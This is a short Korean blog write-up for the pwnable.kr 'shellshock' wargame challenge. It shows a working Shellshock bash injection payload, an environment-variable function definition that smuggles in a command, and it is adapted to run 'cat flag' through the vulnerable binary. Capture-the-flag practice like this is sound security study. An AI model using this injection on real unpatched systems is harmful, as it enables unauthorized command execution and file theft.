ssh shellshock@pwnable.kr -p2222
먼저 아래와 같은 파일을 볼 수 있다.
코드는 아래와 같다.
문제 이름에서도 알 수 있듯 이번 문제는 shellshock 취약점을 이용하여 풀 수 있다.
shellshock와 관련해서는 검색해보면 자세한 설명과 관련 CVE 등을 볼 수 있다.
env x='() { :;}; echo hello' bash -c "echo world"
여기서 다시 shellshock.c를 보면 system("/home/shellshock/bash -c 'echo shock_me'")가 있다.
따라서
env x='() { :;}; echo hello' ./shellshock
를 해준다.
여기서 echo hello 부분을 cat flag로 바꾸면 플래그를 얻을 수 있다.
'Wargame > pwnable.kr' 카테고리의 다른 글
| pwnable.kr blukat (0) | 2019.02.11 |
|---|---|
| pwnable.kr leg (0) | 2019.02.11 |
| pwnable.kr mistake (0) | 2019.02.01 |
| pwnable.kr lotto (0) | 2019.02.01 |
| pwnable.kr blackjack (0) | 2019.02.01 |
댓글